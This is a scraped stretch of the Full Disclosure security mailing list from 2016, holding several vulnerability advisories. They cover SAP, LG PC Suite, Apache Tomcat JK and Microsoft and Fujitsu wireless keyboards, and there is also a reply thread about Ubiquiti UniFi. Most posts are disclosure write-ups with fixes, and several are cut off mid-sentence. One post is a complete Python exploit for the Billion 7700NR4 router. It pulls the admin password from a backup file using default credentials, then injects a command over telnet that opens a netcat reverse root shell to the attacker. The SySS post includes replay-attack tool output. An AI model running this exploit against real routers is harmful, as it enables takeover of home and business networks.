As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the
[FD] Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in SCTC_REORG_SPOOL
Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in SCTC_REORG_SPOOL 1. Impact on Business = By exploiting this vulnerability an authenticated user will be able to take full control of the system. Risk Level: Critical 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-049 - Onapsis SVS ID: ONAPSIS-00255 - CVE: CVE-2016-7435 - Researcher: Pablo Artuso - Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H) - Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) 3. Vulnerability Information - Vendor: SAP AG - Affected Components: SAP Netweaver 7.40 SP 12 - Vulnerability Class: Improper Neutralization of Special Elements used in an OS Command (CWE-78) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: Yes - Original Advisory: https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcreorgspool 4. Affected Components Description == SAP NetWeaver is the SAP technological integration platform, on top of which, enterprise and business solutions are developed and run. In particular, SCTC is a subpackage of SAP_BASIS which holds technical configurations. 5. Vulnerability Details The SCTC_REORG_SPOOL function doesn't correctly sanitize variables used when executing CALL 'SYSTEM' statement, allowing an attacker, with particular privileges, to execute any arbitrary OS command. 6. Solution === Implement SAP Security Note 2260344. 7. Report Timeline == - 11/26/2015: Onapsis provides vulnerability information to SAP AG. - 11/27/2015: SAP AG confirms reception of vulnerability report. - 01/12/2016: SAP reports fix is In Process. - 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you
[FD] Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass
Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass 1. Impact on Business = By exploiting this vulnerability, an attacker could bypass protections implemented in the SAP systems, potentially executing arbitrary business processes. Risk Level: Medium 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-002 - Onapsis SVS ID: ONAPSIS-00165 - CVE: CVE-2016-3635 - Researcher: Sergio Abraham and Pablo Müller - Vendor Provided CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P) - Onapsis CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 3. Vulnerability Information - Vendor: SAP AG - Affected Components: SAP Netweaver 7.4 - Vulnerability Class: Improper Access Control (CWE-284) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: Yes - Original Advisory: https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass 4. Affected Components Description == In SAP, the Remote Function Modules (RFM) are used to execute remote functions in external systems, where the access control can be enforced by a list that is managed through the Unified Connectivity (UCON) framework. 5. Vulnerability Details An authenticated user could execute Remote Function Modules (RFM) which are filtered by the Unified Connectivity (UCON) access control list. Those RFMs are in the final phase of UCON implementation and not included in a Communication Assembly (CA). That means that no user (regardless its privileges) should be able to execute those RFMs. The user needs to remotely execute an anonymous RFM included in a Communication Assembly (enabled by UCON), and by leveraging the same connection execute a second RFM which is filtered (not included in a Communication Assembly). As result, the user will be able to execute a RFM that was originally filtered by UCON, completely bypassing the access control list. 6. Solution === Implement SAP Security Note 2139366. 7. Report Timeline == - 03/03/2015: Onapsis provides vulnerability information to SAP AG. - 05/03/2015: SAP AG confirms reception of vulnerability report. - 10/03/2015: SAP reported fix is In Process. - 14/04/2015: SAP reported fix is In Process. - 12/05/2015: SAP reported fix is In Process. - 09/06/2015: SAP reported fix is In Process. - 09/06/2015: SAP released SAP Security Note 2139366 fixing the vulnerability - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on
Re: [FD] Critical Vulnerability in Ubiquiti UniFi
The impression I get from Tim Pham's emails is that the 'Unify Manager' is doing some behind-the-scenes tunnelling, and bringing the Mongo interface from the server to the client (Eg, Mac or Windows device) and you are then able to connect to localhost (on the client) which tunnels through to the server. However, after much searching, I am unable to locate this application. Googling insinuates that it is this (unreleased) software - https://www.ubnt.com/enterprise/software/ --Rob Thomas Information Security, Sangoma Corporation -Original Message- From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of Gregory Sloop Sent: Wednesday, 5 October 2016 1:54 AM To: Tim Schughart; fulldisclosure@seclists.org; bugt...@securityfocus.com; webapp...@securityfocus.com Cc: Khanh Quoc. Pham Subject: Re: [FD] Critical Vulnerability in Ubiquiti UniFi I attempted private contact with Tim Pham and via email 12+ hours ago, but received no response since then. I've spent some time trying to reproduce the reported vulnerability and have had no success. It certainly doesn't help that the steps to reproduce it are so poorly described or documented. Without better documentation of the exploit, it seems impossible to determine if the report is just mis-informed, blatantly false, or if perhaps there's some step/process I don't understand or am missing. In every attempt I've made the binding of MongoBD to 127.0.0.1 is effective and non-local connection attempts are refused, as one would expect. A swift response from Prosec Networks [prosec-networks.com] would be most helpful. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Billion Router 7700NR4 Remote Root Command Execution
# Title : Billion Router 7700NR4 Remote Root Command Execution # Date : 06/10/2016 # Author : R-73eN # Tested on: Billion Router 7700NR4 # Vendor : http://www.billion.com/ # Vulnerability Description: # This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users. # The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these # credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password. # Using that password we can login to telnet server and use a shell escape to get a reverse root connection. # You must change host with the target and reverse_ip with your attacking ip. # Fix: # The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. # Exploit attached. # Title : Billion Router 7700NR4 Remote Root Command Execution # Date : 06/10/2016 # Author : R-73eN # Tested on: Billion Router 7700NR4 # Vendor : http://www.billion.com/ # Vulnerability Description: # This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users. # The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these # credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password. # Using that password we can login to telnet server and use a shell escape to get a reverse root connection. # You must change host with the target and reverse_ip with your attacking ip. # Fix: # The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. # import requests import base64 import socket import time host = "" def_user = "user" def_pass = "user" reverse_ip = "" #Banner banner = "" banner +=" _____ __ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |\n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \/ _ \ | |\n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \|\___|_| |_| /_/ \_\_|\n\n" print banner # limited shell escape evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &' def execute_payload(password): print "[+] Please run nc -lvp 1337 and then press any key [+]" raw_input() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,23)) s.recv(1024) s.send("admin\r") a= s.recv(1024) time.sleep(1) s.send(password +"\r") time.sleep(1) s.recv(1024) s.send(evil + "\r") time.sleep(1) print "[+] If everything worked you should get a reverse shell [+]" print "[+] Warning pressing any key will close the SHELL [+]" raw_input() r = requests.get("http://; + host + "/backupsettings.conf" , auth=(def_user,def_pass)) if(r.status_code == 200): print "[+] Seems the exploit worked [+]" print "[+] Dumping data . . . [+]" temp = r.text admin_pass = temp.split("")[1].split("")[0] # print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]" execute_payload(str(base64.b64decode(admin_pass))) else: print "[-] Exploit Failed [-]" print "\n[+] https://www.infogen.al/ [+]\n\n" ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] BFS-SA-2016-004: LG PC Suite Insecure Update Mechanism
___ Vendor: LG, www.lg.com Affected Products: LG PC Suite for Windows Affected Version: <= 5.3.25.20150529 (Build 18212) Severity: High OVE ID: OVE-20161010-0007 The LG PC Suite update mechanism is vulnerable to a man-in-the-middle attack. Through the manipulation of files transmitted over HTTP an attacker can force the execution of arbitrary code on the target system. Code is executed with the privileges of the currently logged on user. LG will not provide software updates to address the issue because the LG PC Suite reached the end of its product life cycle. The technical details as well as a possible mitigation is described in the full advisory at: https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-004/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [SECURITY] CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow
CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow Severity: Moderate Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat JK ISAPI Connector 1.2.0 to 1.2.41 Description The IIS/ISAPI specific code implements special handling when a virtual host is present. The virtual host name and the URI are concatenated to create a virtual host mapping rule. The length checks prior to writing to the target buffer for this rule did not take account of the length of the virtual host name, creating the potential for a buffer overflow. It is not known if this overflow is exploitable. Mitigation Users of affected versions should apply one of the following mitigations - Upgrade to Apache Tomcat JK ISAPI Connector 1.2.42 - Where available, use IIS configuration to restrict the maximum URI length to 4095 - (the length of the longest virtual host name) Credit: This issue was discovered by The Apache Tomcat Security Team. References: [1] http://tomcat.apache.org/security-jk.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks
Advisory ID: SYSS-2016-043 Product: Microsoft Wireless Desktop 2000 Manufacturer: Microsoft Affected Version(s): Ver. A Tested Version(s): Ver. A Vulnerability Type: Cryptographic Issues (CWE-310) Insufficient Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-05-19 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air." Due to an insecure implementation of the encrypted data communication, the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay attacks with certain restrictions. Vulnerability Details: The SySS GmbH found out that the Microsoft Wireless Desktop 2000 keyboard is prone to replay attacks with some limitations. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded communication data causing the same effect as the original data communication. According to test results of the SySS GmbH, the Microsoft Wireless Desktop 2000 keyboard and its USB dongle have implemented a replay protection based on an incrementing packet counter. But the used window for valid packet counter values is large enough to perform a replay attack if there were not too many data packets caused by further keystrokes between the attacker's recording and the playback. A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of his or her victim, for instance during a login to the operating system or during unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer and replays the previously recorded AES-encrypted data communication for the password-based user authentication and by this gets unauthorized access to the victim's system. Proof of Concept (PoC): The SySS GmbH could successfully perform a replay attack as described in the previous section using the USB radio dongle Crazyradio PA (see [2]) and a simple proof-of-concept software tool. The following output exemplarily illustrates a replay attack with the recorded data packets for the word "test". # python simple_replay.py Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016 [*] Configure radio [*] Start recording. Pressto stop recording ... [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 083816016234008e [+] Received data: 083816016234008e [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 0838160164340088 [+] Received data: 0838160164340088 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2 [+] Received data: 0838160168340084 [+] Received data: 0838160168340084 [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d ^C [*] Stop recording [*] Press to replay the recorded data packets or to quit ... [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 083816016234008e [+] Send data: 083816016234008e [+] Send data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Send data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Send data:
[FD] [SYSS-2016-068] Fujitsu Wireless Keyboard Set LX901 - Cryptographic Issues (CWE-310), Missing Protection against Replay Attacks
Advisory ID: SYSS-2016-068 Product: Wireless Keyboard Set LX901 Manufacturer: Fujitsu Affected Version(s): Model No. GK900 Tested Version(s): Model No. GK900 Vulnerability Type: Cryptographic Issues (CWE-310) Missing Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-07-07 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: Fujitsu Wireless Keyboard Set LX901 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "The Wireless Keyboard LX901 is a top of the line desktop solution for lifestyle orientated customers, who want only the best for their desk. This superb keyboard set offers ambitious users more functions, security and better features than a conventional interface device. It even includes 2.4 GHz technology and 128 AES encryption for security." Due to an insecure implementation of the encrypted data communication, the wireless keyboard LX901 is vulnerable to replay attacks. Vulnerability Details: The SySS GmbH found out that the wireless keyboard Fujitsu LX901 is prone to replay attacks. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded communication data at will causing the same effect as the original data communication. A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Fujitsu LX901 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of his or her victim, for instance during a login to the operating system or during unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer and replays the previously recorded AES-encrypted data communication for the password-based user authentication and thereby gets unauthorized access to the victim's system. Proof of Concept (PoC): The SySS GmbH could successfully perform a replay attack as described in the previous section using a software-defined radio in combination with the software tool GNU Radio Companion. Solution: According to information from the manufacturer Fujitsu, the reported security issue will currently not be fixed in affected products. The written statement in German from Fujitsu regarding this security issue is as follows: "Vielen Dank für Ihre Informationen zu unserer Funktastatur. Wie Ihnen bereits mitgeteilt, halten wir das von Ihnen beschriebene Angriffsszenario bei unserer Tastatur aufgrund des verwendeten Funkprotokolls unter realen Bedingungen für nicht so einfach durchführbar. Wie erwähnt, verkaufen wir mit unserer Tastatur keine Sicherheitslösung, sondern eine Komfortlösung (ohne gravierende Sicherheitsnachteile wie bei unverschlüsselten Wireless-Tastaturen). In einem bereits geplanten Nachfolgeprodukt werden alle neuen Erkenntnisse zur sicheren Datenübertragung bei Funktastaturen einfließen." The English translation of this statement is as follows: "Thank you very much for your information about our wireless keyboard. As we have already pointed out, we believe that the described scenario is not easy to perform under real conditions due to the radio protocol used. As mentioned, our product is not destined to sell security, but convenience in the first place (without the security drawbacks of unencrypted wireless keyboards). Any new information and insights will be incorporated into the already planned successor product." Disclosure Timeline: 2016-07-07: Vulnerability reported to manufacturer 2016-07-08: Manufacturer acknowledges e-mail with SySS security advisory 2016-08-02: E-mail from manufacturer requesting further information 2016-08-04: Provided further information to manufacturer via e-mail 2016-08-05: E-mail from manufacturer with further questions 2016-08-08: E-mail to manufacturer with answers to open questions 2016-08-12: E-mail from manufacturer with statement regarding the reported security issue 2016-10-05: Public release of the security advisory References: [1] Product website for Fujitsu Wireless Keyboard Set http://www.fujitsu.com/global/products/computing/peripheral/accessories/input-devices/keyboards/wl-keyboard-lx901.html [2] SySS
[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-043 Product: Microsoft Wireless Desktop 2000 Manufacturer: Microsoft Affected Version(s): Ver. A Tested Version(s): Ver. A Vulnerability Type: Cryptographic Issues (CWE-310) Insufficient Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-05-19 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air." Due to an insecure implementation of the encrypted data communication, the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay attacks with certain restrictions. Vulnerability Details: The SySS GmbH found out that the Microsoft Wireless Desktop 2000 keyboard is prone to replay attacks with some limitations. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded communication data causing the same effect as the original data communication. According to test results of the SySS GmbH, the Microsoft Wireless Desktop 2000 keyboard and its USB dongle have implemented a replay protection based on an incrementing packet counter. But the used window for valid packet counter values is large enough to perform a replay attack if there were not too many data packets caused by further keystrokes between the attacker's recording and the playback. A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of his or her victim, for instance during a login to the operating system or during unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer and replays the previously recorded AES-encrypted data communication for the password-based user authentication and by this gets unauthorized access to the victim's system. Proof of Concept (PoC): The SySS GmbH could successfully perform a replay attack as described in the previous section using the USB radio dongle Crazyradio PA (see [2]) and a simple proof-of-concept software tool. The following output exemplarily illustrates a replay attack with the recorded data packets for the word "test". # python simple_replay.py Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016 [*] Configure radio [*] Start recording. Pressto stop recording ... [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 083816016234008e [+] Received data: 083816016234008e [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 0838160164340088 [+] Received data: 0838160164340088 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2 [+] Received data: 0838160168340084 [+] Received data: 0838160168340084 [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d ^C [*] Stop recording [*] Press to replay the recorded data packets or to quit ... [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 083816016234008e [+] Send data: 083816016234008e [+] Send data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Send data:
[FD] [SYSS-2016-033] Microsoft Wireless Desktop 2000 - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-033 Product: Microsoft Wireless Desktop 2000 Manufacturer: Microsoft Affected Version(s): Ver. A Tested Version(s): Ver. A Vulnerability Type: Insufficient Protection of Code (Firmware) and Data (Cryptographic Key) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-04-22 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Gerhard Klostermeier and Matthias Deeg (SySS GmbH) Overview: Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air." Due to the insufficient protection of the flash memory of the keyboard and of the USB dongle, an attacker with physical access has read and write access to the firmware and the used cryptographic key. Vulnerability Details: The SySS GmbH found out that the embedded flash memory of the wireless keyboard Microsoft Wireless Desktop 2000 and of the corresponding USB dongle can be read and written via the SPI interface of the used transceivers with an embedded microcontroller nRF24LE1H (keyboard) and nRF24LU1+ (USB dongle) as the flash memory is not protected by the offered read back protection feature (RDISMB - Read DISable Main Block). Thus, an attacker with physical access to the keyboard or the USB dongle can simply read and write the SPI-addressable code and data flash memory. Due to the use of nRF24 transceiver versions with one-time programmable memory, write access is limited in such a way that a set 1 bit can be changed to a 0 bit but not vice versa. The AES cryptographic key used by the Microsoft Wireless Desktop 2000 keyboard and the corresponding USB dongle is for both devices accessible via the SPI interface. By having read and write access to the code and data flash memory, an attacker can either extract the cryptographic key, for instance to perform further attacks against the wireless communication, or modify the firmware or the cryptographic key in a limited way due to the used one-time programmable memory. Proof of Concept (PoC): The SySS GmbH could successfully read the contents of the code and data flash memory of the Microsoft Wireless Desktop 2000 keyboard and of the USB dongle using the hardware tool Bus Pirate [3] in combination with the software tool nrfprog [4]. Solution: The SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-04-22: Vulnerability reported to manufacturer 2016-04-23: Manufacturer acknowledges e-mail with SySS security advisory 2016-06-06: E-mail to manufacturer according current status 2016-06-27: Another e-mail to manufacturer according current status 2016-06-27: E-mail from manufacturer requesting further information 2016-06-28: Provided further information and PoC software tool 2016-07-07: E-mail from manufacturer with further information and question about intended disclosure 2016-07-08: E-mail to manufacturer concerning the planned responsible disclosure 2016-08-04: E-mail from manufacturer concerning limitations of actual attacks 2016-10-05: Public release of the security advisory References: [1] Product website for Microsoft Wireless Desktop 2000 https://www.microsoft.com/accessories/en-us/products/keyboards/wireless-desktop-2000/m7j-1 [2] Website of Bus Pirate hardware tool http://dangerousprototypes.com/docs/Bus_Pirate [3] nrfprog Github repository https://github.com/nekromant/nrfprog [4] SySS Security Advisory SYSS-2016-033 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-033.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Gerhard Klostermeier and Matthias Deeg of the SySS GmbH. E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7 E-Mail:
Re: [FD] IE11 is not following CORS specification for local files
